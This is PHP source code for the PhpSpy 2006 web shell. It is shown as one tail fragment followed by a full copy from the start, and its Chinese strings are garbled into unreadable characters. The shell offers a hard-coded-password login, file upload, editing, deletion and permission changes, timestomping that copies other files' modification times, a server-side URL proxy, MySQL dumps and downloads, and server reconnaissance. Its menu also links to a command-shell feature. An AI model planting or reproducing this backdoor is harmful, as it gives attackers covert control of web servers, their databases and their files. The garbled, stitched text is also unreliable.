$tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','蟀諉','','submit'));
@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname);
$tables = @mysql_list_tables($dbname);
while ($table = @mysql_fetch_row($tables)) {
$cachetables[$table[0]] = $table[0];
}
@mysql_free_result($tables);
if (empty($cachetables)) {
$tb->tdbody('<b>蠟羶衄蟀諉杅擂踱 or 絞杅擂踱羶衄睡杅擂桶</b>');
} else {
$tb->tdbody('<table border="0" cellpadding="3" cellspacing="1"><tr><td valign="top">恁寁桶:</td><td>'.$tb->makeselect(array('name'=>'table[]','option'=>$cachetables,'multiple'=>1,'size'=>15,'css'=>1)).'</td></tr><tr nowrap><td><input type="radio" name="backuptype" value="server" checked> 掘爺杅擂垀悵湔腔繚噤:</td><td>'.$tb->makeinput('path',$pathname.'/'.$_SERVER['HTTP_HOST'].'_MySQL.sql','','text','50').'</td></tr><tr nowrap><td colspan="2"><input type="radio" name="backuptype" value="download"> 眻諉狟婥善掛華 (巠磁杅擂講誕苤腔杅擂踱)</td></tr></table>');
$tb->makehidden('do','backupmysql');
$tb->formfooter('0','30');
}
$tb->tablefooter();
@mysql_close();
}//end sql backup
elseif ($_GET['action'] == "phpenv") {
$upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "祥埰勍奻換";
$adminmail=(isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
if ($dis_func == "") {
$dis_func = "No";
}else {
$dis_func = str_replace(" ","<br>",$dis_func);
$dis_func = str_replace(",","<br>",$dis_func);
}
$phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
$info = array(
0 => array("督昢奀潔",date("Y爛m堎d h:i:s",time())),
1 => array("督昢郖靡","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"),
2 => array("督昢IP華硊",gethostbyname($_SERVER['SERVER_NAME'])),
3 => array("督昢紱釬炵苀",PHP_OS),
5 => array("督昢紱釬炵苀恅趼晤鎢",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
6 => array("督昢賤祒竘",$_SERVER['SERVER_SOFTWARE']),
7 => array("Web督昢傷諳",$_SERVER['SERVER_PORT']),
8 => array("PHP堍俴源宒",strtoupper(php_sapi_name())),
9 => array("PHP唳掛",PHP_VERSION),
10 => array("堍俴衾假耀宒",getphpcfg("safemode")),
11 => array("督昢奪燴埜",$adminmail),
12 => array("掛恅璃繚噤",__FILE__),
13 => array("埰勍妏蚚 URL 湖羲恅璃 allow_url_fopen",getphpcfg("allow_url_fopen")),
14 => array("埰勍雄怓樓婥蟈諉踱 enable_dl",getphpcfg("enable_dl")),
15 => array("珆尨渣昫陓洘 display_errors",getphpcfg("display_errors")),
16 => array("赻雄隅砱擁曹講 register_globals",getphpcfg("register_globals")),
17 => array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")),
18 => array("最唗郔嗣埰勍妏蚚囀湔講 memory_limit",getphpcfg("memory_limit")),
19 => array("POST郔湮趼誹杅 post_max_size",getphpcfg("post_max_size")),
20 => array("埰勍郔湮奻換恅璃 upload_max_filesize",$upsize),
21 => array("最唗郔酗堍俴奀潔 max_execution_time",getphpcfg("max_execution_time")."鏃"),
22 => array("掩輦蚚腔滲杅 disable_functions",$dis_func),
23 => array("phpinfo()",$phpinfo),
24 => array("醴遜衄諾豻諾潔diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
25 => array("芞倛揭燴 GD Library",getfun("imageline")),
26 => array("IMAP萇赽蚘璃炵苀",getfun("imap_close")),
27 => array("MySQL杅擂踱",getfun("mysql_close")),
28 => array("SyBase杅擂踱",getfun("sybase_close")),
29 => array("Oracle杅擂踱",getfun("ora_close")),
30 => array("Oracle 8 杅擂踱",getfun("OCILogOff")),
31 => array("PREL眈逄楊 PCRE",getfun("preg_match")),
32 => array("PDF恅紫盓厥",getfun("pdf_close")),
33 => array("Postgre SQL杅擂踱",getfun("pg_close")),
34 => array("SNMP厙釐奪燴衪祜",getfun("snmpget")),
35 => array("揤坫恅璃盓厥(Zlib)",getfun("gzclose")),
36 => array("XML賤昴",getfun("xml_set_object")),
37 => array("FTP",getfun("ftp_login")),
38 => array("ODBC杅擂踱蟀諉",getfun("odbc_close")),
39 => array("Session盓厥",getfun("session_start")),
40 => array("Socket盓厥",getfun("fsockopen")),
);
$tb->tableheader();
echo "<form action=\"?action=phpenv\" method=\"POST\">\n";
$tb->tdbody('<b>脤艘PHP饜离統杅袨錶</b>','left','1','30','style="padding-left: 5px;"');
$tb->tdbody('怀饜离統杅(:magic_quotes_gpc): '.$tb->makeinput('phpvarname','','','text','40').' '.$tb->makeinput('','脤艘','','submit'),'left','2','30','style="padding-left: 5px;"');
$tb->makehidden('do','viewphpvar');
echo "</form>\n";
$hp = array(0=> '督昢杻俶', 1=> 'PHP價掛杻俶', 2=> '郪璃盓厥袨錶');
for ($a=0;$a<3;$a++) {
$tb->tdbody('<b>'.$hp[1].'</b>','left','1','30','style="padding-left: 5px;"');
?>
<tr class="secondalt">
<td>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<?php
if ($a==0) {
for($i=0;$i<=12;$i++) {
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
}
} elseif ($a == 1) {
for ($i=13;$i<=24;$i++) {
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
}
} elseif ($a == 2) {
for ($i=25;$i<=40;$i++) {
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
}
}
?>
</table>
</td>
</tr>
<?php
}//for
echo "</table>";
}//end phpenv
?>
<hr width="775" noshade>
<table width="775" border="0" cellpadding="0">
<tr>
<td>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</td>
<td align="right"><?php
debuginfo();
ob_end_flush();
?></td>
</tr>
</table>
</center>
</body>
</html>
<?php
/*======================================================
滲杅踱
======================================================*/
// 腎翻諳
function loginpage() {
?>
<style type="text/css">
input {font-family: "Verdana";font-size: "11px";BACKGROUND-COLOR: "#FFFFFF";height: "18px";border: "1px solid #666666";}
</style>
<form method="POST" action="">
<span style="font-size: 11px; font-family: Verdana">Password: </span><input name="adminpass" type="password" size="20">
<input type="hidden" name="do" value="login">
<input type="submit" value="Login">
</form>
<?php
exit;
}//end loginpage()
// 珜醱覃彸陓洘
function debuginfo() {
global $starttime;
$mtime = explode(' ', microtime());
$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
echo "Processed in $totaltime second(s)";
}
// 裁蛌砱趼睫
function stripslashes_array(&$array) {
while(list($key,$var) = each($array)) {
if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
if (is_string($var)) {
$array[$key] = stripslashes($var);
}
if (is_array($var)) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}
// 刉壺醴翹
function deltree($deldir) {
$mydir=@dir($deldir);
while($file=$mydir->read()) {
if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
@chmod("$deldir/$file",0777);
deltree("$deldir/$file");
}
if (is_file("$deldir/$file")) {
@chmod("$deldir/$file",0777);
@unlink("$deldir/$file");
}
}
$mydir->close();
@chmod("$deldir",0777);
return (@rmdir($deldir)) ? 1 : 0;
}
// 瓚剿黍迡錶
function dir_writeable($dir) {
if (!is_dir($dir)) {
@mkdir($dir, 0777);
}
if(is_dir($dir)) {
if ($fp = @fopen("$dir/test.txt", 'w')) {
@fclose($fp);
@unlink("$dir/test.txt");
$writeable = 1;
} else {
$writeable = 0;
}
}
return $writeable;
}
// 桶跡俴潔腔掖劓伎杸遙
function getrowbg() {
global $bgcounter;
if ($bgcounter++%2==0) {
return "firstalt";
} else {
return "secondalt";
}
}
// 鳳絞腔恅璃炵苀繚噤
function getPath($mainpath, $relativepath) {
global $dir;
$mainpath_info = explode('/', $mainpath);
$relativepath_info = explode('/', $relativepath);
$relativepath_info_count = count($relativepath_info);
for ($i=0; $i<$relativepath_info_count; $i++) {
if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
if ($relativepath_info[$i] == '..') {
$mainpath_info_count = count($mainpath_info);
unset($mainpath_info[$mainpath_info_count-1]);
continue;
}
$mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
} //end for
return implode('/', $mainpath_info);
}
// 潰脤PHP饜离統杅
function getphpcfg($varname) {
switch($result = get_cfg_var($varname)) {
case 0:
return "No";
break;
case 1:
return "Yes";
break;
default:
return $result;
break;
}
}
// 潰脤滲杅錶
function getfun($funName) {
return (false !== function_exists($funName)) ? "Yes" : "No";
}
// 揤坫湖婦濬
class PHPZip{
var $out='';
function PHPZip($dir) {
if (@function_exists('gzcompress')) {
$curdir = getcwd();
if (is_array($dir)) $filelist = $dir;
else{
$filelist=$this -> GetFileList($dir);//恅璃蹈桶
foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
}
if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
else chdir($curdir);
if (count($filelist)>0){
foreach($filelist as $filename){
if (is_file($filename)){
$fd = fopen ($filename, "r");
$content = @fread ($fd, filesize ($filename));
fclose ($fd);
if (is_array($dir)) $filename = basename($filename);
$this -> addFile($content, $filename);
}
}
$this->out = $this -> file();
chdir($curdir);
}
return 1;
}
else return 0;
}
// 鳳腕硌隅醴翹恅璃蹈桶
function GetFileList($dir){
static $a;
if (is_dir($dir)) {
if ($dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if($file!='.' && $file!='..'){
$f=$dir .'/'. $file;
if(is_dir($f)) $this->GetFileList($f);
$a[]=$f;
}
}
closedir($dh);
}
}
return $a;
}
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
} // end if
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
}
function addFile($data, $name, $time = 0) {
$name = str_replace('\\', '/', $name);
$dtime = dechex($this->unix2DosTime($time));
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$c_len = strlen($zdata);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$fr .= pack('v', strlen($name));
$fr .= pack('v', 0);
$fr .= $name;
$fr .= $zdata;
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$this -> datasec[] = $fr;
$new_offset = strlen(implode('', $this->datasec));
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name) );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
$cdrec .= pack('V', $this -> old_offset );
$this -> old_offset = $new_offset;
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function file() {
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);
return
$data .
$ctrldir .
$this -> eof_ctrl_dir .
pack('v', sizeof($this -> ctrl_dir)) .
pack('v', sizeof($this -> ctrl_dir)) .
pack('V', strlen($ctrldir)) .
pack('V', strlen($data)) .
"\x00\x00";
}
}
// 掘爺杅擂踱
function sqldumptable($table, $fp=0) {
$tabledump = "DROP TABLE IF EXISTS $table;\n";
$tabledump .= "CREATE TABLE $table (\n";
$firstfield=1;
$fields = mysql_query("SHOW FIELDS FROM $table");
while ($field = mysql_fetch_array($fields)) {
if (!$firstfield) {
$tabledump .= ",\n";
} else {
$firstfield=0;
}
$tabledump .= " $field[Field] $field[Type]";
if (!empty($field["Default"])) {
$tabledump .= " DEFAULT '$field[Default]'";
}
if ($field['Null'] != "YES") {
$tabledump .= " NOT NULL";
}
if ($field['Extra'] != "") {
$tabledump .= " $field[Extra]";
}
}
mysql_free_result($fields);
$keys = mysql_query("SHOW KEYS FROM $table");
while ($key = mysql_fetch_array($keys)) {
$kname=$key['Key_name'];
if ($kname != "PRIMARY" and $key['Non_unique'] == 0) {
$kname="UNIQUE|$kname";
}
if(!is_array($index[$kname])) {
$index[$kname] = array();
}
$index[$kname][] = $key['Column_name'];
}
mysql_free_result($keys);
while(list($kname, $columns) = @each($index)) {
$tabledump .= ",\n";
$colnames=implode($columns,",");
if ($kname == "PRIMARY") {
$tabledump .= " PRIMARY KEY ($colnames)";
} else {
if (substr($kname,0,6) == "UNIQUE") {
$kname=substr($kname,7);
}
$tabledump .= " KEY $kname ($colnames)";
}
}
$tabledump .= "\n);\n\n";
if ($fp) {
fwrite($fp,$tabledump);
} else {
echo $tabledump;
}
$rows = mysql_query("SELECT * FROM $table");
$numfields = mysql_num_fields($rows);
while ($row = mysql_fetch_array($rows)) {
$tabledump = "INSERT INTO $table VALUES(";
$fieldcounter=-1;
$firstfield=1;
while (++$fieldcounter<$numfields) {
if (!$firstfield) {
$tabledump.=", ";
} else {
$firstfield=0;
}
if (!isset($row[$fieldcounter])) {
$tabledump .= "NULL";
} else {
$tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
}
}
$tabledump .= ");\n";
if ($fp) {
fwrite($fp,$tabledump);
} else {
echo $tabledump;
}
}
mysql_free_result($rows);
}
class FORMS {
function tableheader() {
echo "<table width=\"775\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\">\n";
}
function headerform($arg=array()) {
global $dir;
if ($arg[enctype]){
$enctype="enctype=\"$arg[enctype]\"";
} else {
$enctype="";
}
if (!isset($arg[method])) {
$arg[method] = "POST";
}
if (!isset($arg[action])) {
$arg[action] = '';
}
echo " <form action=\"".$arg[action]."\" method=\"".$arg[method]."\" $enctype>\n";
echo " <tr>\n";
echo " <td>".$arg[content]."</td>\n";
echo " </tr>\n";
echo " </form>\n";
}
function tdheader($title) {
global $dir;
echo " <tr class=\"firstalt\">\n";
echo " <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">殿隙</a>]</b></td>\n";
echo " </tr>\n";
}
function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') {
if ($bgcolor=='2') {
$css="secondalt";
} elseif ($bgcolor=='1') {
$css="firstalt";
} else {
$css=$bgcolor;
}
$height = empty($height) ? "" : " height=".$height;
$colspan = empty($colspan) ? "" : " colspan=".$colspan;
echo " <tr class=\"".$css."\">\n";
echo " <td align=\"".$align."\"".$height." ".$colspan." ".$extra.">".$content."</td>\n";
echo " </tr>\n";
}
function tablefooter() {
echo "</table>\n";
}
function formheader($action='',$title,$target='') {
global $dir;
$target = empty($target) ? "" : " target=\"".$target."\"";
echo " <form action=\"$action\" method=\"POST\"".$target.">\n";
echo " <tr class=\"firstalt\">\n";
echo " <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">殿隙</a>]</b></td>\n";
echo " </tr>\n";
}
function makehidden($name,$value=''){
echo "<input type=\"hidden\" name=\"$name\" value=\"$value\">\n";
}
function makeinput($name,$value='',$extra='',$type='text',$size='30',$css='input'){
$css = ($css == 'input') ? " class=\"input\"" : "";
$input = "<input name=\"$name\" value=\"$value\" type=\"$type\" ".$css." size=\"$size\" $extra>\n";
return $input;
}
function maketextarea($name,$content='',$cols='100',$rows='20',$extra=''){
$textarea = "<textarea name=\"".$name."\" cols=\"".$cols."\" rows=\"".$rows."\" ".$extra.">".$content."</textarea>\n";
return $textarea;
}
function formfooter($over='',$height=''){
$height = empty($height) ? "" : " height=\"".$height."\"";
echo " <tr class=\"secondalt\">\n";
echo " <td align=\"center\"".$height."><input class=\"input\" type=\"submit\" value=\"隅\"></td>\n";
echo " </tr>\n";
echo " </form>\n";
echo $end = empty($over) ? "" : "</table>\n";
}
function makeselect($arg = array()){
if ($arg[multiple]==1) {
$multiple = " multiple";
if ($arg[size]>0) {
$size = "size=$arg[size]";
}
}
if ($arg[css]==0) {
$css = "class=\"input\"";
}
$select = "<select $css name=\"$arg[name]\"$multiple $size>\n";
if (is_array($arg[option])) {
foreach ($arg[option] AS $key=>$value) {
if (!is_array($arg[selected])) {
if ($arg[selected]==$key) {
$select .= "<option value=\"$key\" selected>$value</option>\n";
} else {
$select .= "<option value=\"$key\">$value</option>\n";
}
} elseif (is_array($arg[selected])) {
if ($arg[selected][$key]==1) {
$select .= "<option value=\"$key\" selected>$value</option>\n";
} else {
$select .= "<option value=\"$key\">$value</option>\n";
}
}
}
}
$select .= "</select>\n";
return $select;
}
}
?>
原碼如下
<?php
/*
+--------------------------------------------------------------------------+
| str_replace(".", "", "P.h.p.S.p.y") Version:2006 |
| Codz by Angel |
| (c) 2004 Security Angel Team |
| http://www.4ngel.net |
| ======================================================================== |
| Team: http://www.4ngel.net |
| http://www.bugkidz.org |
| Email: [email protected] |
| Date: Mar 21st 2005 |
| Thx All The Fantasy of Wickedness's members |
| Thx FireFox (http://www.molyx.com) |
+--------------------------------------------------------------------------+
*/
error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
/*===================== 最唗饜离 =====================*/
// 岆瘁剒猁躇鎢桄痐,1峈剒猁桄痐,坻杅趼峈眻諉輛.狟醱恁砐寀拸虴
$admin['check'] = "1";
// 彆剒猁躇鎢桄痐,党蜊腎翻躇鎢
$admin['pass'] = "307598989";
/*===================== 饜离賦旰 =====================*/
// 埰勍最唗婓 register_globals = off 腔遠噫狟馱釬
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
$self = $_SERVER['PHP_SELF'];
$dis_func = get_cfg_var("disable_functions");
/*===================== 旯爺桄痐 =====================*/
if($admin['check'] == "1") {
if ($_GET['action'] == "logout") {
setcookie ("adminpass", "");
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">蛁种傖髡......<p><a href=\"".$self."\">鏃綴赻雄豖堤麼等僻涴爵豖堤最唗賜醱 >>></a></span>";
exit;
}
if ($_POST['do'] == 'login') {
$thepass=trim($_POST['adminpass']);
if ($admin['pass'] == $thepass) {
setcookie ("adminpass",$thepass,time()+(1*24*3600));
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">腎翻傖髡......<p><a href=\"".$self."\">鏃綴赻雄泐蛌麼等僻涴爵輛最唗賜醱 >>></a></span>";
exit;
}
}
if (isset($_COOKIE['adminpass'])) {
if ($_COOKIE['adminpass'] != $admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}
/*===================== 桄痐賦旰 =====================*/
// 瓚剿 magic_quotes_gpc 袨怓
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
// 脤艘PHPINFO
if ($_GET['action'] == "phpinfo") {
echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 滲杅眒掩輦蚚,脤艘<PHP遠噫曹講>";
exit;
}
// 婓盄測燴
if (isset($_POST['url'])) {
$proxycontents = @file_get_contents($_POST['url']);
echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>鳳 URL 囀囮啖</b></p></center></body>";
exit;
}
// 狟婥恅璃
if (!empty($downfile)) {
if (!@file_exists($downfile)) {
echo "<script>alert('斕猁狟腔恅璃祥湔婓!')</script>";
} else {
$filename = basename($downfile);
$filename_info = explode('.', $filename);
$fileext = $filename_info[count($filename_info)-1];
header('Content-type: application/x-'.$fileext);
header('Content-Disposition: attachment; filename='.$filename);
header('Content-Description: PHP Generated Data');
header('Content-Length: '.filesize($downfile));
@readfile($downfile);
exit;
}
}
// 眻諉狟婥掘爺杅擂踱
if ($_POST['backuptype'] == 'download') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("杅擂踱蟀諉囮啖");
@mysql_select_db($dbname) or die("恁寁杅擂踱囮啖");
$table = array_flip($_POST['table']);
$result = mysql_query("SHOW tables");
echo ($result) ? NULL : "堤渣: ".mysql_error();
$filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql");
header('Content-type: application/unknown');
header('Content-Disposition: attachment; filename='.$filename);
$mysqldata = '';
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
$mysqldata.= sqldumptable($currow[0]);
$mysqldata.= $mysqldata."\r\n";
}
}
mysql_close();
exit;
}
// 最唗醴翹
$pathname=str_replace('\\','/',dirname(__FILE__));
// 鳳絞繚噤
if (!isset($dir) or empty($dir)) {
$dir = ".";
$nowpath = getPath($pathname, $dir);
} else {
$dir=$_GET['dir'];
$nowpath = getPath($pathname, $dir);
}
// 瓚剿黍迡錶
$dir_writeable = (dir_writeable($nowpath)) ? "褫迡" : "祥褫迡";
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href=\"?action=reg\">蛁聊桶紱釬</a>" : "";
$tb = new FORMS;
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>PhpSpy Ver 2006</title>
<style type="text/css">
body,td {
font-family: "Tahoma";
font-size: "12px";
line-height: "150%";
}
.smlfont {
font-family: "Tahoma";
font-size: "11px";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
padding-left: "2px";
}
.redfont {
COLOR: "#A60000";
}
a:link,a:visited,a:active {
color: "#000000";
text-decoration: underline;
}
a:hover {
color: "#465584";
text-decoration: none;
}
.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
</style>
<SCRIPT language=JavaScript>
function CheckAll(form) {
for (var i=0;i<form.elements.length;i++) {
var e = form.elements[i];
if (e.name != 'chkall')
e.checked = form.chkall.checked;
}
}
function really(d,f,m,t) {
if (confirm(m)) {
if (t == 1) {
window.location.href='?dir='+d+'&deldir='+f;
} else {
window.location.href='?dir='+d+'&delfile='+f;
}
}
}
</SCRIPT>
</head>
<body style="table-layout:fixed; word-break:break-all">
<center>
<?php
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td align="right"><b>'.$_SERVER['REMOTE_ADDR'].'</b></td></tr></table>','center','top');
$tb->tdbody('<a href="?action=logout">蛁种頗趕</a> | <a href="?action=dir">殿隙PhpSpy醴翹</a> | <a href="?action=phpenv">PHP遠噫曹講</a> | <a href="?action=proxy">婓盄測燴</a>'.$reg.$phpinfo.' | <a href="?action=shell">WebShell</a> | <a href="?action=sql">SQL Query</a> | <a href="?action=sqlbak">MySQL Backup</a>');
$tb->tablefooter();
?>
<hr width="775" noshade>
<table width="775" border="0" cellpadding="0">
<?
$tb->headerform(array('method'=>'GET','content'=>'<p>最唗繚噤: '.$pathname.'<br>絞醴翹('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'<br>泐蛌醴翹: '.$tb->makeinput('dir').' '.$tb->makeinput('','隅','','submit').' □盓厥橈勤繚噤睿眈勤繚噤■'));
$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'奻換恅璃善絞醴翹: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','隅','','submit').$tb->makeinput('uploaddir',$dir,'','hidden')));
$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'陔膘恅璃婓絞醴翹: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','隅','','submit')));
$tb->headerform(array('content'=>'陔膘醴翹婓絞醴翹: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','隅','','submit')));
?>
</table>
<hr width="775" noshade>
<?php
/*===================== 硒俴紱釬 羲宎 =====================*/
echo "<p><b>\n";
// 刉壺恅璃
if (!empty($delfile)) {
if (file_exists($delfile)) {
echo (@unlink($delfile)) ? $delfile." 刉壺傖髡!" : "恅璃刉壺囮啖!";
} else {
echo basename($delfile)." 恅璃眒祥湔婓!";
}
}
// 刉壺醴翹
elseif (!empty($deldir)) {
$deldirs="$dir/$deldir";
if (!file_exists("$deldirs")) {
echo "$deldir 醴翹眒祥湔婓!";
} else {
echo (deltree($deldirs)) ? "醴翹刉壺傖髡!" : "醴翹刉壺囮啖!";
}
}
// 斐膘醴翹
elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
if (!empty($newdirectory)) {
$mkdirs="$dir/$newdirectory";
if (file_exists("$mkdirs")) {
echo "蜆醴翹眒湔婓!";
} else {
echo (@mkdir("$mkdirs",0777)) ? "斐膘醴翹傖髡!" : "斐膘囮啖!";
@chmod("$mkdirs",0777);
}
}
}
// 奻換恅璃
elseif ($doupfile) {
echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "奻換傖髡!" : "奻換囮啖!";
}
// 晤憮恅璃
elseif ($_POST['do'] == 'doeditfile') {
if (!empty($_POST['editfilename'])) {
$filename="$editfilename";
@$fp=fopen("$filename","w");
echo $msg=@fwrite($fp,$_POST['filecontent']) ? "迡恅璃傖髡!" : "迡囮啖!";
@fclose($fp);
} else {
echo "怀砑猁晤憮腔恅璃靡!";
}
}
// 晤憮恅璃扽俶
elseif ($_POST['do'] == 'editfileperm') {
if (!empty($_POST['fileperm'])) {
$fileperm=base_convert($_POST['fileperm'],8,10);
echo (@chmod($dir."/".$file,$fileperm)) ? "扽俶党蜊傖髡!" : "党蜊囮啖!";
echo " 恅璃 ".$file." 党蜊綴腔扽俶峈: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4);
} else {
echo "怀砑猁扢离腔扽俶!";
}
}
// 恅璃蜊靡
elseif ($_POST['do'] == 'rename') {
if (!empty($_POST['newname'])) {
$newname=$_POST['dir']."/".$_POST['newname'];
if (@file_exists($newname)) {
echo "".$_POST['newname']." 眒冪湔婓,笭陔怀珨跺!";
} else {
echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." 傖髡蜊靡峈 ".$_POST['newname']." !" : "恅璃靡党蜊囮啖!";
}
} else {
echo "怀砑猁蜊腔恅璃靡!";
}
}
// 親癒奀潔
elseif ($_POST['do'] == 'domodtime') {
if (!@file_exists($_POST['curfile'])) {
echo "猁党蜊腔恅璃祥湔婓!";
} else {
if (!@file_exists($_POST['tarfile'])) {
echo "猁統桽腔恅璃祥湔婓!";
} else {
$time=@filemtime($_POST['tarfile']);
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 腔党蜊奀潔傖髡蜊峈 ".date("Y-m-d H:i:s",$time)." !" : "恅璃腔党蜊奀潔党蜊囮啖!";
}
}
}
// 赻隅砱奀潔
elseif ($_POST['do'] == 'modmytime') {
if (!@file_exists($_POST['curfile'])) {
echo "猁党蜊腔恅璃祥湔婓!";
} else {
$year=$_POST['year'];
$month=$_POST['month'];
$data=$_POST['data'];
$hour=$_POST['hour'];
$minute=$_POST['minute'];
$second=$_POST['second'];
if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) {
$time=strtotime("$data $month $year $hour:$minute:$second");
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 腔党蜊奀潔傖髡蜊峈 ".date("Y-m-d H:i:s",$time)." !" : "恅璃腔党蜊奀潔党蜊囮啖!";
}
}
}
// 蟀諉MYSQL
elseif ($connect) {
if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
echo "杅擂踱蟀諉傖髡!";
mysql_close();
} else {
echo mysql_error();
}
}
